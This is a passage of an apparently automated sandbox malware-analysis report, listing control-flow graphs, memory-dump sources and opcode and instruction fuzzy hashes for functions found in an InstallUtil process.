aa8d11-aa8d20 1575->1580 1591 aa8c80-aa8c83 1577->1591 1592 aa8c76-aa8c7b 1577->1592 1578->1566 1601 aa8c44-aa8c49 1578->1601 1587 aa8d48 1580->1587 1588 aa8d22-aa8d2b 1580->1588 1583 aa8ccd-aa8cd2 1581->1583 1584 aa8cd7-aa8cda 1581->1584 1583->1553 1589 aa8ce0-aa8ce3 1584->1589 1590 aa8d66-aa8d96 call aa8378 1584->1590 1595 aa8d4d-aa8d4f 1587->1595 1602 aa8d2d-aa8d3f 1588->1602 1603 aa8d41 1588->1603 1589->1581 1593 aa8ce5 1589->1593 1610 aa8d98-aa8dac 1590->1610 1611 aa8dad-aa8db1 1590->1611 1591->1590 1594 aa8c89-aa8c8c 1591->1594 1592->1553 1593->1571 1594->1577 1599 aa8c8e 1594->1599 1595->1571 1600 aa8d51-aa8d5d 1595->1600 1599->1571 1600->1553 1601->1553 1605 aa8d46 1602->1605 1603->1605 1605->1595
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'sq$4'sq$;sq
                                                        • API String ID: 0-111817264
                                                        • Opcode ID: 5b475fceffff28f9e40f2eadd77b82fbfbcd6ef4c429776892ca7c32b463e480
                                                        • Instruction ID: 034a69078c02895b2290d48cb5892c52f1cfc4126ad1b3bfb31e0555c9db0d00
                                                        • Opcode Fuzzy Hash: 5b475fceffff28f9e40f2eadd77b82fbfbcd6ef4c429776892ca7c32b463e480
                                                        • Instruction Fuzzy Hash: 8AF17B707142118FDB299B29C958B3D77A6AF86740F2944AAE502CF3E2EF2DCC429751
                                                        Function 00AA77F0 Relevance: 3.2, Strings: 2, Instructions: 707COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2384 aa77f0-aa7cde 2459 aa8230-aa8265 2384->2459 2460 aa7ce4-aa7cf4 2384->2460 2465 aa8271-aa828f 2459->2465 2466 aa8267-aa826c 2459->2466 2460->2459 2461 aa7cfa-aa7d0a 2460->2461 2461->2459 2463 aa7d10-aa7d20 2461->2463 2463->2459 2464 aa7d26-aa7d36 2463->2464 2464->2459 2467 aa7d3c-aa7d4c 2464->2467 2477 aa8291-aa829b 2465->2477 2478 aa8306-aa8312 2465->2478 2468 aa8356-aa835b 2466->2468 2467->2459 2469 aa7d52-aa7d62 2467->2469 2469->2459 2471 aa7d68-aa7d78 2469->2471 2471->2459 2472 aa7d7e-aa7d8e 2471->2472 2472->2459 2474 aa7d94-aa7da4 2472->2474 2474->2459 2476 aa7daa-aa7dba 2474->2476 2476->2459 2479 aa7dc0-aa822f 2476->2479 2477->2478 2483 aa829d-aa82a9 2477->2483 2484 aa8329-aa8335 2478->2484 2485 aa8314-aa8320 2478->2485 2492 aa82ab-aa82b6 2483->2492 2493 aa82ce-aa82d1 2483->2493 2490 aa834c-aa834e 2484->2490 2491 aa8337-aa8343 2484->2491 2485->2484 2494 aa8322-aa8327 2485->2494 2490->2468 2575 aa8350 call aa87e9 2490->2575 2491->2490 2504 aa8345-aa834a 2491->2504 2492->2493 2506 aa82b8-aa82c2 2492->2506 2496 aa82e8-aa82f4 2493->2496 2497 aa82d3-aa82df 2493->2497 2494->2468 2499 aa835c-aa837e 2496->2499 2500 aa82f6-aa82fd 2496->2500 2497->2496 2508 aa82e1-aa82e6 2497->2508 2510 aa838e 2499->2510 2511 aa8380 2499->2511 2500->2499 2505 aa82ff-aa8304 2500->2505 2504->2468 2505->2468 2506->2493 2516 aa82c4-aa82c9 2506->2516 2508->2468 2515 aa8390-aa8391 2510->2515 2511->2510 2514 aa8387-aa838c 2511->2514 2514->2515 2516->2468 2575->2468
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $sq$$sq
                                                        • API String ID: 0-1184984226
                                                        • Opcode ID: 477a70ae89d2ecd406eb0122324fb00c5f1bf2b84f371d381432b61a57cb5ba6
                                                        • Instruction ID: b3bfb738ba1d8071d5ab960d54524c2abc5b632ad998ccd6cd88f2175aa334dd
                                                        • Opcode Fuzzy Hash: 477a70ae89d2ecd406eb0122324fb00c5f1bf2b84f371d381432b61a57cb5ba6
                                                        • Instruction Fuzzy Hash: 22521F74E002188FEB159BE4C860BEEBB72EF84300F5080AAD55A6B395DF359E85DF51
                                                        Function 00AA56A8 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hwq$Hwq
                                                        • API String ID: 0-741242263
                                                        • Opcode ID: e53b00c266a8aee4835fbff88656a2427d74541c1f213e34425e2d5cae3b5947
                                                        • Instruction ID: cc2cc61c2e8facea4d428f73c5273a99c3ed6247bd511f0e84f3420f6a41bd4d
                                                        • Opcode Fuzzy Hash: e53b00c266a8aee4835fbff88656a2427d74541c1f213e34425e2d5cae3b5947
                                                        • Instruction Fuzzy Hash: 47B1D271B046148FCB1A9F78C898B7E7BA2AB8A340F148969E846CB3D1DF34CC41D795
                                                        Function 00AA5C08 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,wq$,wq
                                                        • API String ID: 0-1895925779
                                                        • Opcode ID: eb56deea4519c5a1fbd3b2231e2dbe77bb8dd13a36ee287d4a2b4aed2767332e
                                                        • Instruction ID: 935988ca77fdee86d36b716560af5e01d1305e69ba87290671cd87f140a5fdb9
                                                        • Opcode Fuzzy Hash: eb56deea4519c5a1fbd3b2231e2dbe77bb8dd13a36ee287d4a2b4aed2767332e
                                                        • Instruction Fuzzy Hash: 31819075E00A05DFCB18CF79C888AAAB7B2BF8A314B258169D405DB3A5DB31ED41CB54
                                                        Function 00AA3428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xwq$Xwq
                                                        • API String ID: 0-2617233878
                                                        • Opcode ID: 0675a6437eeddefcda9c1833efb44c09fcb69e0ba4ac5ec6346c335a66af8be0
                                                        • Instruction ID: 7029ab0505e3aecef62c1376b6e9a85b228ee8e1388e174a6fa5760ddae79775
                                                        • Opcode Fuzzy Hash: 0675a6437eeddefcda9c1833efb44c09fcb69e0ba4ac5ec6346c335a66af8be0
                                                        • Instruction Fuzzy Hash: 6B31D373F043258BDF1D4ABA999427EA5AAABCA311F18443DF816C73C0DFB4CE419691
                                                        Function 00AAA818 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: E
                                                        • API String ID: 0-3568589458
                                                        • Opcode ID: 3e50202de2be80568ea931f24bca4308ecacadcda93a6329a3422cd10d234308
                                                        • Instruction ID: e7f1b002ce3f848732cb16c37ea28ab05853bc16e31758b05c0af2fb38e3fa17
                                                        • Opcode Fuzzy Hash: 3e50202de2be80568ea931f24bca4308ecacadcda93a6329a3422cd10d234308
                                                        • Instruction Fuzzy Hash: 05F13D75A402148FCB05CFADC9849ADBBF2FF99310B1A8059E515EB3A2CB35EC41CB61
                                                        Function 00AA0C8F Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRsq
                                                        • API String ID: 0-3165563352
                                                        • Opcode ID: e9b77c9a155ba904afb15cbfc3322c0e261b72af6d34b6baac826ec8331fe137
                                                        • Instruction ID: fee45991ca5d0f9f3f60cbf7b289d9fb655b52c023d49eeede23d05e1a8ab0ab
                                                        • Opcode Fuzzy Hash: e9b77c9a155ba904afb15cbfc3322c0e261b72af6d34b6baac826ec8331fe137
                                                        • Instruction Fuzzy Hash: CF22D874901219CFCB54EF74E984A9DBBB2FF48301F1089AAE849AB355DB706D85DF80
                                                        Function 00AA0CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRsq
                                                        • API String ID: 0-3165563352
                                                        • Opcode ID: be7c086722d37fb990fbf0cfeecee5e89f6e48fe90ab7b3f497728f22913e250
                                                        • Instruction ID: 56ace81af545baf7be862fb7f58d09832b0a07d7b51c3b979c386caaa8d72b57
                                                        • Opcode Fuzzy Hash: be7c086722d37fb990fbf0cfeecee5e89f6e48fe90ab7b3f497728f22913e250
                                                        • Instruction Fuzzy Hash: AE22C974901219CFCB54EF64E984A9DBBB2FF48301F1089AAE849BB355DB706D85DF80
                                                        Function 00AAA650 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq
                                                        • API String ID: 0-609861455
                                                        • Opcode ID: 9f537d862d96e9f4ccbea08ae894257e209feb15c6264d05c0b9d533398b8a1d
                                                        • Instruction ID: b20c9836013193fc2a3b6b19f12867cdf0075c68b082c259c4a4b53ce829427a
                                                        • Opcode Fuzzy Hash: 9f537d862d96e9f4ccbea08ae894257e209feb15c6264d05c0b9d533398b8a1d
                                                        • Instruction Fuzzy Hash: F341E136B002148FCB199B789854AEEBBF2EBC9310F148469E506D7392CF349C02CBE1
                                                        Function 00AA9070 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: U
                                                        • API String ID: 0-3372436214
                                                        • Opcode ID: 6d818fbdcc75802f0f87e7d6b4c89250215ba1c56bef846ee3b57dd683a8dcba
                                                        • Instruction ID: 6f3b9e1d332e7f59aa282092ef3ee59f39371cc66fe8c56c6ff6cdc8f13773fb
                                                        • Opcode Fuzzy Hash: 6d818fbdcc75802f0f87e7d6b4c89250215ba1c56bef846ee3b57dd683a8dcba
                                                        • Instruction Fuzzy Hash: CB21B171541A169BC348CB2DC8C8553BB6ABF82379B56C319D8784B6D6D332E852C7D0
                                                        Function 00AA7438 Relevance: .2, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d291efbc8af88e69bc3ce16ffe25857bed63a430bab9fc4a6584e618a3ea2aa7
                                                        • Instruction ID: 01e85fff17c7be114586a7ac4881d181529026a80934ccd86197759abc652bac
                                                        • Opcode Fuzzy Hash: d291efbc8af88e69bc3ce16ffe25857bed63a430bab9fc4a6584e618a3ea2aa7
                                                        • Instruction Fuzzy Hash: F5711C34B046568FCB19DF28C898A6E7BF5AF5A700F1544A9E506CB3B1DB70DC41CB90
                                                        Function 00AACEC7 Relevance: .2, Instructions: 171COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f6b035796c72b8be17e47c0c01f77e073745e04e02e71de48f34ed6507aa33b
                                                        • Instruction ID: 9c46f6b43a0fcad666b7539a94db8863c06ee566b31ea24fe7e741b71337147d
                                                        • Opcode Fuzzy Hash: 1f6b035796c72b8be17e47c0c01f77e073745e04e02e71de48f34ed6507aa33b
                                                        • Instruction Fuzzy Hash: 7451BF30CB6766DFC3082F60A9AC16E7BA0FF0F7177456D45B08EC50268BB094A5EB11
                                                        Function 00AAE2D9 Relevance: .2, Instructions: 157COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 690ffeedbcca0d99e3ef82c0ce6005631747bdc3f647716431ed747c7a020c4a
                                                        • Instruction ID: 976b33977dff2d29bfaa45f83c67041409257d64b436fccdc91f62fde267943a
                                                        • Opcode Fuzzy Hash: 690ffeedbcca0d99e3ef82c0ce6005631747bdc3f647716431ed747c7a020c4a
                                                        • Instruction Fuzzy Hash: 5F611474E01218DFDB19DFE4D894A9EBBB2FF88300F608529D805AB295DB755A85CF40
                                                        Function 00AACD10 Relevance: .1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5cdf747df517231329cf9e2e3ef561c6469d4228eeba755e86ace372440adfa7
                                                        • Instruction ID: 59ce103ae778df5a117b63e292e08801a77790ec8fd913c418772cd06b039b62
                                                        • Opcode Fuzzy Hash: 5cdf747df517231329cf9e2e3ef561c6469d4228eeba755e86ace372440adfa7
                                                        • Instruction Fuzzy Hash: 40519374E012089FDB58DFAAD98499DBBF2BF89300F20816AE419AB365DB309901CF40
                                                        Function 00AA3908 Relevance: .1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae26f90df2fb131020752732be02e72f067bf70a56835cc95c51867ff46d43e2
                                                        • Instruction ID: 32197d9e455e6882e1341dd5ab126ac2d7c6c0a6655e4d4446dff4f9bc80a0c9
                                                        • Opcode Fuzzy Hash: ae26f90df2fb131020752732be02e72f067bf70a56835cc95c51867ff46d43e2
                                                        • Instruction Fuzzy Hash: 9B518F75E01208DFCB48DFB9D59499DBBF2FF89301B209469E805AB364DB31A941CF40
                                                        Function 00AA9A63 Relevance: .1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 039d113e16711ed3a955ac7aad02465d5fea7fb2903b7ea349731ccaed82633f
                                                        • Instruction ID: dffb7dc7ff8b7b6e7eb60c1f305b37b87e312d5506b4fe788ba10cd859ffc6b3
                                                        • Opcode Fuzzy Hash: 039d113e16711ed3a955ac7aad02465d5fea7fb2903b7ea349731ccaed82633f
                                                        • Instruction Fuzzy Hash: 0941BE31A04249DFCF15CFA8D884ADEBFB2EF4A350F148556E855AB291D334ED12CBA0
                                                        Function 00AAE134 Relevance: .1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03164af2f687d71531561040f7294c321b7f8c915659a63432189a1d2609586e
                                                        • Instruction ID: be6931ad27dfbb61e126ef3fa59661b4e194390bbfc4b544233ee53b30378174
                                                        • Opcode Fuzzy Hash: 03164af2f687d71531561040f7294c321b7f8c915659a63432189a1d2609586e
                                                        • Instruction Fuzzy Hash: 3A416874D45218CFCB14DFA8D5906EDBBB2FF5A300F209529E405AB281CBB1A882CF64
                                                        Function 00AAD7CE Relevance: .1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21bf283ee8408cfbf8174455907b95e85f6a76f1307e7cd235d1950369c4a6c7
                                                        • Instruction ID: 6b25e5e7fccdb9a51625e375a85bc0949fac47d313752b930008723b95a15cb6
                                                        • Opcode Fuzzy Hash: 21bf283ee8408cfbf8174455907b95e85f6a76f1307e7cd235d1950369c4a6c7
                                                        • Instruction Fuzzy Hash: 8E414774D04208CFCB08DFA8D5846EDBBB2FB4A301F209519E48AAB695D7359842CF64
                                                        Function 00AAE0D4 Relevance: .1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11b2b23ede4421a9cbab3746d2fc7ca33aee9b0e2448815502bcf7ae5c5281b0
                                                        • Instruction ID: ffbcd07bfaf2452ac8b4ebd629decaed2e7ab747b0055ba2b3ae33f64845c508
                                                        • Opcode Fuzzy Hash: 11b2b23ede4421a9cbab3746d2fc7ca33aee9b0e2448815502bcf7ae5c5281b0
                                                        • Instruction Fuzzy Hash: 3E411470D45218CFCB14DFA8D5946EEBBB2BF5A300F209529E405BB291D7B5A882CF64
                                                        Function 00AAD76E Relevance: .1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b44cd69543d55bf9b9221c1407024dd200e650977938d38330eb725a5265601
                                                        • Instruction ID: d58e396350099cf8cb918c08f869a8f94c9324dfe908d4cb3189cb0d14ad083c
                                                        • Opcode Fuzzy Hash: 3b44cd69543d55bf9b9221c1407024dd200e650977938d38330eb725a5265601
                                                        • Instruction Fuzzy Hash: 5C411574D01208CFCB08DFA8D5846EDBBF2FB4A301F209519E44AB7695D7399882CF54
                                                        Function 00AAD620 Relevance: .1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c72a70fbeba9b46aab8649c12401a78b78cc6dba0ed76169e81854843db0c9b3
                                                        • Instruction ID: 02849aedb5319fa23f55aa6f70f6759528de2ca9c069d86e04b27838a88b6b8f
                                                        • Opcode Fuzzy Hash: c72a70fbeba9b46aab8649c12401a78b78cc6dba0ed76169e81854843db0c9b3
                                                        • Instruction Fuzzy Hash: BC411770D01208CBCB08DFAAD544AEEFBF2BB8A300F24D529D455B7695DB759841CF64
                                                        Function 00AA4DC8 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 870b50fa0b66748a36945f5041602e5bfb10bd8c5974ce7c360102a18c3519f6
                                                        • Instruction ID: a30e3e7eed44115fa2d048d96e8f7ee494669a3ee5852f7343bc3c6a4af2e80f
                                                        • Opcode Fuzzy Hash: 870b50fa0b66748a36945f5041602e5bfb10bd8c5974ce7c360102a18c3519f6
                                                        • Instruction Fuzzy Hash: 393190317002299FCF169FA4D854AAF7BA2FF8C301F108429F9558B292CB75DD61DBA1
                                                        Function 00AA76D0 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d39f55a8f90a655ba84e6e64a7d6ae2608bb671a4c7cbfef232ccabd3d1ef1d
                                                        • Instruction ID: b55f9603e8dcb790af888c33d8ed1efc36e416f52f3e908dc0a0145c09935dab
                                                        • Opcode Fuzzy Hash: 5d39f55a8f90a655ba84e6e64a7d6ae2608bb671a4c7cbfef232ccabd3d1ef1d
                                                        • Instruction Fuzzy Hash: 112103347082114BEB1957358D94A7F67A7AFCA719B14407AD506CB7D6EF28CC42E780
                                                        Function 00AAA809 Relevance: .1, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4121a301bce434f1b4695645c7597590a58581aab60026cd237cedb4a47ae610
                                                        • Instruction ID: 3acd1d1cbc3ae3ed68e56954538a8bc174d26408c01413075b86c56a49b17114
                                                        • Opcode Fuzzy Hash: 4121a301bce434f1b4695645c7597590a58581aab60026cd237cedb4a47ae610
                                                        • Instruction Fuzzy Hash: F0318C71B405198FCB04CF69C8889AEBBF2FF99350B168259E555DB3A6CB349C02CB91
                                                        Function 00AA9080 Relevance: .1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31fe17990e362babba3a9e9e08db7111f6a61256a8a53390a11294874c284123
                                                        • Instruction ID: 9d826cd8405442f4438277452fe9b421f360099bb05e6890bd19fa2a3aa731a4
                                                        • Opcode Fuzzy Hash: 31fe17990e362babba3a9e9e08db7111f6a61256a8a53390a11294874c284123
                                                        • Instruction Fuzzy Hash: 2C31BF71541A169BC348CB2DC8C8593B7AABF82378B56C719D8388B6D6D731E853C7D0
                                                        Function 00AA76E0 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4a4e1b125763f7035ae842ad806e740ccba5cec0b57f33712b511704a5e1fcf
                                                        • Instruction ID: 3174624bf891aec06760f92149f0db8505cb94c1a3bb8572e429adaf4a6a1a7b
                                                        • Opcode Fuzzy Hash: e4a4e1b125763f7035ae842ad806e740ccba5cec0b57f33712b511704a5e1fcf
                                                        • Instruction Fuzzy Hash: 2121D0347082114BEB2557258D94A3F7697AFC6B18F248479D506CB7DAEF29CC42A780
                                                        Function 00AA5A60 Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4d8ca6752af41a7d1449a21c7861ee84bdb879d1e9ac8e0ecad28eb7dc101c18
                                                        • Instruction ID: eeb9a77b9c60f0a203a47dae702123c38485bcb8abea9a729519c7a57e166dd0
                                                        • Opcode Fuzzy Hash: 4d8ca6752af41a7d1449a21c7861ee84bdb879d1e9ac8e0ecad28eb7dc101c18
                                                        • Instruction Fuzzy Hash: C321F531B00A228FD72A9B35D49853EB7A2EFC57517158669E846CB396CF24DC02C7C4
                                                        Function 00AA2060 Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5b7a0d919913e5d4201b5349d7e308fbe15303f593dcc63aa69fab31a884aaf
                                                        • Instruction ID: c8fd0bb39def26f8eea33c8f90633d0b7a191d41ebdab6ce2e00e21dddb46a26
                                                        • Opcode Fuzzy Hash: d5b7a0d919913e5d4201b5349d7e308fbe15303f593dcc63aa69fab31a884aaf
                                                        • Instruction Fuzzy Hash: 7121E571A002059FCF18DB38D440AAE77B5EB9D350B21C859D9099B284DB35EE45CBD1
                                                        Function 00AA4DB9 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
